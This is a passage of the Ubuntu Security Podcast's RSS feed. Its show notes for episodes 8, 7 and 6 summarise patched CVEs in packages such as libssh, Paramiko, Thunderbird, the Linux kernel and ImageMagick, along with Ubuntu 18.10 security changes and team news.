        <googleplay:description>This week we look at some details of the 15 unique CVEs addressed across the supported Ubuntu releases and discuss some of the security relevant changes in Ubuntu 18.10, plus a refresh of the Ubuntu CVE tracker and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 15 unique CVEs addressed across the supported Ubuntu releases and discuss some of the security relevant changes in Ubuntu 18.10, plus a refresh of the Ubuntu CVE tracker and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>15 unique CVEs addressed</p>
<h3 id="usn-3790-1-requests-vulnerability">[<a href="https://usn.ubuntu.com/3790-1/">USN-3790-1</a>] Requests vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18074">CVE-2018-18074</a></li>
</ul>
</li>
<li>Requests library could end up sending credentials in clear text if server is configured with a https -&gt; http redirect</li>
</ul>
<h3 id="usn-3792-1-usn-3792-2-net-snmp-vulnerability">[<a href="https://usn.ubuntu.com/3792-1/">USN-3792-1</a>, <a href="https://usn.ubuntu.com/3792-2/">USN-3792-2</a>] Net-SNMP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic &amp; Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-18065">CVE-2018-18065</a></li>
</ul>
</li>
<li>Remote DoS via a NULL pointer dereference from an <strong>authenticated</strong> attacker</li>
</ul>
<h3 id="usn-3793-1-thunderbird-vulnerabilities">[<a href="https://usn.ubuntu.com/3793-1/">USN-3793-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12385">CVE-2018-12385</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12383">CVE-2018-12383</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12378">CVE-2018-12378</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12377">CVE-2018-12377</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12376">CVE-2018-12376</a></li>
</ul>
</li>
<li>New Thunderbird version (60) containing 5 fixes</li>
<li>Interestingly <strong>all</strong> of these were also vulnerabilities in Firefox - in
particular CVE-2018-12383 was discussed in Episode 4 for Firefox</li>
</ul>
<h3 id="usn-3794-1-moinmoin-vulnerability">[<a href="https://usn.ubuntu.com/3794-1/">USN-3794-1</a>] MoinMoin vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-5934">CVE-2017-5934</a></li>
</ul>
</li>
<li>XSS in link editor dialog allow injection of arbitrary web content (HTML, scripts etc)</li>
</ul>
<h3 id="usn-3789-2-clamav-vulnerabilities">[<a href="https://usn.ubuntu.com/3789-2/">USN-3789-2</a>] ClamAV vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15378">CVE-2018-15378</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14682">CVE-2018-14682</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14681">CVE-2018-14681</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14680">CVE-2018-14680</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14679">CVE-2018-14679</a></li>
</ul>
</li>
<li>Corresponding fix for Precise ESM from ClamAV which we discussed in Episode 7</li>
<li>Also rolls in fixes for 4 other vulnerabilities in the embedded mspack library
<ul>
<li>In trusty and precise we used the embedded libmspack, newer releases use
the system package so weren&rsquo;t affected</li>
</ul>
</li>
</ul>
<h3 id="usn-3795-1-libssh-vulnerability">[<a href="https://usn.ubuntu.com/3795-1/">USN-3795-1</a>] libssh vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-10933">CVE-2018-10933</a></li>
</ul>
</li>
<li>Embedded SSH server and client implementation</li>
<li>Allows bypass of authentication by remote attackers if they send a SSH2_MSG_USERAUTH_SUCCESS message instead of the SSH2_MSG_USERAUTH_REQUEST message to initiate the authentication process</li>
<li>This message is meant to be sent from the server to the client but in this case are sending it <strong>to the server</strong></li>
<li>State machine on server-side then jumps straight to &lsquo;Authenticated&rsquo;</li>
<li>Only affects applications which use libssh as a server</li>
</ul>
<h3 id="usn-3796-1-usn-3796-2-paramiko-vulnerability">[<a href="https://usn.ubuntu.com/3796-1/">USN-3796-1</a>, USN-3796-2] Paramiko vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic &amp; Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000805">CVE-2018-1000805</a></li>
</ul>
</li>
<li>Python SSH library for both servers and clients</li>
<li>Very similar to CVE-2018-10933 for libssh - remote authentication bypass by presenting SSH2_MSG_USERAUTH_SUCCESS in place of SSH2_MSG_USERAUTH_REQUEST</li>
<li>Due to code-reuse between client and server implementations</li>
<li>On server side, runs the normal client side code to be used when receiving this authentication success from the server, and flips the &lsquo;authenticated&rsquo; flag - which is shared by both the server and client code</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-18-dot-10-cosmic-cuttlefish-released">Ubuntu 18.10 Cosmic Cuttlefish Released</h3>
<ul>
<li>Includes OpenSSL 1.1.1 for TLS 1.3 support</li>
<li>Support for using fingerprint readers to unlock screen etc
<ul>
<li>Ubuntu Security Team consider fingerprints to be akin to usernames only - so we don&rsquo;t enable fingerprint authentication by default - need to opt-in</li>
<li>libfprint and fprintd promoted to main to allow this</li>
</ul>
</li>
</ul>
<h3 id="ubuntu-cve-tracker-facelift">Ubuntu CVE Tracker facelift</h3>
<ul>
<li>Refreshed look and feel via bootstrap</li>
<li><a href="https://ubuntu.com/security/">https://ubuntu.com/security/</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E008.mp3" length="8806111" type="audio/mpeg" /><itunes:duration>9:10</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 7
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-7/</link>
          <pubDate>Tue, 16 Oct 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E007.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 7</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 78 unique CVEs addressed across the supported Ubuntu releases including more GhostScript, ImageMagick, WebKitGTK, Linux kernel and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 78 unique CVEs addressed across the supported Ubuntu releases including more GhostScript, ImageMagick, WebKitGTK, Linux kernel and more.</itunes:summary>
        <description>This week we look at some details of the 78 unique CVEs addressed across the supported Ubuntu releases including more GhostScript, ImageMagick, WebKitGTK, Linux kernel and more.</description>
        <googleplay:description>This week we look at some details of the 78 unique CVEs addressed across the supported Ubuntu releases including more GhostScript, ImageMagick, WebKitGTK, Linux kernel and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 78 unique CVEs addressed across the supported Ubuntu releases including more GhostScript, ImageMagick, WebKitGTK, Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>78 unique CVEs addressed</p>
<h3 id="usn-3773-1-ghostscript-vulnerabilities">[<a href="https://usn.ubuntu.com/3773-1/">USN-3773-1</a>] Ghostscript vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17183">CVE-2018-17183</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16510">CVE-2018-16510</a></li>
</ul>
</li>
<li>Similar to [<a href="https://usn.ubuntu.com/3768-1/">USN-3768-1</a>] from Episode 5</li>
</ul>
<h3 id="usn-3769-2-bind-vulnerability">[<a href="https://usn.ubuntu.com/3769-2/">USN-3769-2</a>] Bind vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5740">CVE-2018-5740</a></li>
</ul>
</li>
<li>Extended Security Maintenance version of [<a href="https://usn.ubuntu.com/3769-1/">USN-3769-1</a>]</li>
</ul>
<h3 id="usn-3774-1-strongswan-vulnerability">[<a href="https://usn.ubuntu.com/3774-1/">USN-3774-1</a>] strongSwan vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17540">CVE-2018-17540</a></li>
</ul>
</li>
<li>[<a href="https://usn.ubuntu.com/3771-1/">USN-3771-1</a>] incorporated fixes for multiple CVEs - but these fixes themselves introduced this new vulnerability</li>
<li>Heap buffer overflow found by Google&rsquo;s OSS-Fuzz leading to DoS for gmp plugin</li>
</ul>
<h3 id="usn-3775-1-usn-3775-2-usn-3776-1-usn-3776-2-usn-3777-1-usn-3777-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3775-1/">USN-3775-1</a>, <a href="https://usn.ubuntu.com/3775-2/">USN-3775-2</a>, <a href="https://usn.ubuntu.com/3776-1/">USN-3776-1</a>, <a href="https://usn.ubuntu.com/3776-2/">USN-3776-2</a>, USN-3777-1, <a href="https://usn.ubuntu.com/3777-2/">USN-3777-2</a>] Linux kernel vulnerabilities</h3>
<ul>
<li>11 CVEs addressed across Precise ESM, Trusty, Xenial and Bionic including HWE kernels
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-6555">CVE-2018-6555</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-6554">CVE-2018-6554</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14633">CVE-2018-14633</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14634">CVE-2018-14634</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15572">CVE-2018-15572</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15594">CVE-2018-15594</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16276">CVE-2018-16276</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10902">CVE-2018-10902</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10853">CVE-2018-10853</a></li>
<li><a href="https://ubuntu.com/security/CVE-2017-18216">CVE-2017-18216</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17182">CVE-2018-17182</a></li>
</ul>
</li>
<li>Not all CVEs affect all releases</li>
<li>Includes:
<ul>
<li>UAF and memory leak -&gt; DoS in IRDA</li>
<li>Stack buffer overwrite in iSCSI - low chance of privilege escalation</li>
<li>Integer overflow leading to possible privilege escalation but only on machines with &gt;32GB RAM</li>
<li>Insufficiencies discovered in various Spectre variant mitigations previously deployed</li>
<li>Incorrect bounds checking in yurex USB driver from userspace -&gt; crash / privilege escalation for local user</li>
<li>Race condition in midi driver - double free -&gt; privilege escalation</li>
<li>KVM hypervisor instruction emulation fail to check privileges - privilege escalation inside guest</li>
<li>OCFS2 file-system driver NULL pointer dereference -&gt; BUG (mutex logic bug)</li>
<li>Memory management sequence number overflow leading to UAF -&gt; possible privilege escalation - Jann Horn (GPZ)</li>
</ul>
</li>
</ul>
<h3 id="usn-3780-1-haproxy-vulnerability">[<a href="https://usn.ubuntu.com/3780-1/">USN-3780-1</a>] HAProxy vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14645">CVE-2018-14645</a></li>
</ul>
</li>
<li>Out of bounds read leading to remote crash -&gt; DoS</li>
</ul>
<h3 id="usn-3781-1-webkitgtk-plus-vulnerabilities">[<a href="https://usn.ubuntu.com/3781-1/">USN-3781-1</a>] WebKitGTK+ vulnerabilities</h3>
<ul>
<li>24 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-4361">CVE-2018-4361</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4359">CVE-2018-4359</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4358">CVE-2018-4358</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4328">CVE-2018-4328</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4323">CVE-2018-4323</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4319">CVE-2018-4319</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4318">CVE-2018-4318</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4317">CVE-2018-4317</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4316">CVE-2018-4316</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4315">CVE-2018-4315</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4314">CVE-2018-4314</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4312">CVE-2018-4312</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4311">CVE-2018-4311</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4309">CVE-2018-4309</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4306">CVE-2018-4306</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4299">CVE-2018-4299</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4213">CVE-2018-4213</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4212">CVE-2018-4212</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4210">CVE-2018-4210</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4209">CVE-2018-4209</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4208">CVE-2018-4208</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4207">CVE-2018-4207</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4197">CVE-2018-4197</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-4191">CVE-2018-4191</a></li>
</ul>
</li>
<li>Used by many GNOME applications to render web content (Epiphany, Evolution, Boxes, GThumb, Buidler, Empathy, etc)</li>
<li>Many issues fixed in this release including, XSS, DoS, RCE etc</li>
</ul>
<h3 id="usn-3782-1-liblouis-vulnerabilities">[<a href="https://usn.ubuntu.com/3782-1/">USN-3782-1</a>] Liblouis vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17294">CVE-2018-17294</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12085">CVE-2018-12085</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3778-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3778-1/">USN-3778-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12387">CVE-2018-12387</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12386">CVE-2018-12386</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12385">CVE-2018-12385</a></li>
</ul>
</li>
<li>Firefox 62 release - includes fixes for RCE, local cache poisoning and information disclosures</li>
</ul>
<h3 id="usn-3783-1-apache-http-server-vulnerabilities">[<a href="https://usn.ubuntu.com/3783-1/">USN-3783-1</a>] Apache HTTP Server vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-11763">CVE-2018-11763</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1333">CVE-2018-1333</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1302">CVE-2018-1302</a></li>
</ul>
</li>
<li>DoS (crash) via incorrect stream destruction and DoS (resources) from incorrect frame handling</li>
</ul>
<h3 id="usn-3785-1-imagemagick-vulnerabilities">[<a href="https://usn.ubuntu.com/3785-1/">USN-3785-1</a>] ImageMagick vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-13144">CVE-2017-13144</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16749">CVE-2018-16749</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16645">CVE-2018-16645</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16644">CVE-2018-16644</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16643">CVE-2018-16643</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16642">CVE-2018-16642</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16323">CVE-2018-16323</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14551">CVE-2018-14551</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16750">CVE-2018-16750</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16640">CVE-2018-16640</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14437">CVE-2018-14437</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14436">CVE-2018-14436</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14435">CVE-2018-14435</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14434">CVE-2018-14434</a></li>
</ul>
</li>
<li>Disables support for using PS and PDF from Ghostscript in ImageMagick due to
large number of GS vulns (see Episode 5)</li>
<li>Also multiple fixes for ImageMagick itself, including memory leaks (DoS), information disclosure, RCE etc</li>
</ul>
<h3 id="usn-3784-1-apparmor-update">[<a href="https://usn.ubuntu.com/3784-1/">USN-3784-1</a>] AppArmor update</h3>
<ul>
<li>Hardening of various AppArmor profiles (mentioned in Episode 5)</li>
</ul>
<h3 id="lsn-0044-1-linux-kernel-vulnerability">[LSN-0044-1] Linux kernel vulnerability</h3>
<ul>
<li>Livepatch incorporating L1TF, Spectrev2 and other fixes as well</li>
</ul>
<h3 id="usn-3786-1-libxkbcommon-vulnerabilities">[<a href="https://usn.ubuntu.com/3786-1/">USN-3786-1</a>] libxkbcommon vulnerabilities</h3>
<ul>
<li>11 CVEs addressed in Trusty, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15864">CVE-2018-15864</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15863">CVE-2018-15863</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15862">CVE-2018-15862</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15861">CVE-2018-15861</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15859">CVE-2018-15859</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15858">CVE-2018-15858</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15857">CVE-2018-15857</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15856">CVE-2018-15856</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15855">CVE-2018-15855</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15854">CVE-2018-15854</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15853">CVE-2018-15853</a></li>
</ul>
</li>
<li>Loads keyboard descriptions from disk - multiple vulnerabilities in file
format handling leading to DoS etc</li>
</ul>
<h3 id="usn-3787-1-tomcat-vulnerability">[<a href="https://usn.ubuntu.com/3787-1/">USN-3787-1</a>] Tomcat vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-11784">CVE-2018-11784</a></li>
</ul>
</li>
<li>Redirect handling allowed attacker to redirect to any URI of their choice</li>
<li>Can be avoided if had manually enabled both mapperDirectoryRedirectEnabled and mapperContextRootRedirectEnabled</li>
</ul>
<h3 id="usn-3789-1-clamav-vulnerability">[<a href="https://usn.ubuntu.com/3789-1/">USN-3789-1</a>] ClamAV vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-15378">CVE-2018-15378</a></li>
</ul>
</li>
<li>Crash in handling of unpacked MEW executable files</li>
</ul>
<h3 id="usn-3788-1-tex-live-vulnerabilities">[<a href="https://usn.ubuntu.com/3788-1/">USN-3788-1</a>] Tex Live vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17407">CVE-2018-17407</a></li>
<li><a href="https://ubuntu.com/security/CVE-2015-5700">CVE-2015-5700</a></li>
</ul>
</li>
<li>File overwrite via insecure symlink handling</li>
<li>Code execution via buffer overflow in Type1 font handler</li>
</ul>
<h3 id="usn-3791-1-git-vulnerability">[<a href="https://usn.ubuntu.com/3791-1/">USN-3791-1</a>] Git vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17456">CVE-2018-17456</a></li>
</ul>
</li>
<li>RCE when cloning a malicious repository - due to insufficient validation of git submodule URLs and paths.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E007.mp3" length="10803956" type="audio/mpeg" /><itunes:duration>11:15</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 6
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-6/</link>
          <pubDate>Tue, 02 Oct 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E006.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 6</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases and more.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases and more.</itunes:summary>
        <description>This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases and more.</description>
        <googleplay:description>This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases and more.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 17 unique CVEs addressed across the supported Ubuntu releases and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>17 unique CVEs addressed</p>
<h3 id="usn-3771-1-strongswan-vulnerabilities">[<a href="https://usn.ubuntu.com/3771-1/">USN-3771-1</a>] strongSwan vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5388">CVE-2018-5388</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16152">CVE-2018-16152</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16151">CVE-2018-16151</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10811">CVE-2018-10811</a></li>
</ul>
</li>
<li>2 CVEs: flaws in RSA implementation allow Bleichenbacher-style attacks in parsing of the ASN.1 encoded digestInfo</li>
<li>strongSwan implementation was too lenient and would allow arbitrary random data to be contained following various elements in the ASN.1</li>
<li>Also would not check the correct amount of padding had been used</li>
<li>Allows attackers to potentially forge low-exponent signature forgery and hence authentication during IKE authentication</li>
<li>2 CVEs for DoS due to missing length check and missing variable initialization</li>
</ul>
<h3 id="usn-3772-1-udisks-vulnerability">[<a href="https://usn.ubuntu.com/3772-1/">USN-3772-1</a>] UDisks vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-17336">CVE-2018-17336</a></li>
</ul>
</li>
<li>Format string vulnerability which could be exploited via specially crafted disk label</li>
<li>udisks prints volume label via printf() passing the label as part of the format string
<ul>
<li>Simple fix to replace the label with a %s directive and then pass the label to that</li>
<li>ie. don&rsquo;t interpret label as printf() directives directly</li>
</ul>
</li>
</ul>
<h3 id="usn-3719-3-mutt-vulnerabilities">[<a href="https://usn.ubuntu.com/3719-3/">USN-3719-3</a>] Mutt vulnerabilities</h3>
<ul>
<li>12 CVEs addressed in Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14349">CVE-2018-14349</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14362">CVE-2018-14362</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14351">CVE-2018-14351</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14356">CVE-2018-14356</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14355">CVE-2018-14355</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14357">CVE-2018-14357</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14353">CVE-2018-14353</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14358">CVE-2018-14358</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14359">CVE-2018-14359</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14354">CVE-2018-14354</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14352">CVE-2018-14352</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14350">CVE-2018-14350</a></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="lsm-stacking-upstreaming">LSM Stacking upstreaming</h3>
<ul>
<li>Casey Schaufler (Intel, SMACK maintainer) primary developer along with John Johansen and Kees Cook (Google) to upstream support for LSM stacking</li>
<li>Currently upstream allows use of one &lsquo;major&rsquo; module (SELinux / AppArmor / Tomoyo) with a minor module (Yama etc)</li>
<li>Goal of stacking is to allow multiple major modules to be used in conjunction (AppArmor with SELinux)
<ul>
<li>Primary use-case is containers</li>
</ul>
</li>
<li>Current stacking patches allow to stack Tomoyo with either SELinux / AppArmor
<ul>
<li>Eventually should be able to stack SELinux with AppArmor but still WIP</li>
<li>Ubuntu already carries these patches in Bionic etc</li>
</ul>
</li>
<li>Likely to be merged in the near future</li>
</ul>
<h3 id="evince-apparmor-hardening-lp-1788929">Evince AppArmor hardening <a href="https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1788929">LP #1788929</a></h3>
<ul>
<li>Jann Horn (GPZ) reported gaps in evince AppArmor profile</li>
<li>Clever use of GNOME thumbnailer infrastructure to specify a new &rsquo;evil&rsquo; thumbnailer and the use of systemd via DBus to escape AppArmor confinement</li>
<li>Policy fixed in Cosmic, in process of updating for Bionic etc</li>
</ul>
<h3 id="new-ubuntu-security-manager">New Ubuntu Security Manager</h3>
<ul>
<li>Joe McManus</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E006.mp3" length="11472272" type="audio/mpeg" /><itunes:duration>11:56</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 5
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-5/</link>
          <pubDate>Mon, 24 Sep 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E005.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 5</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
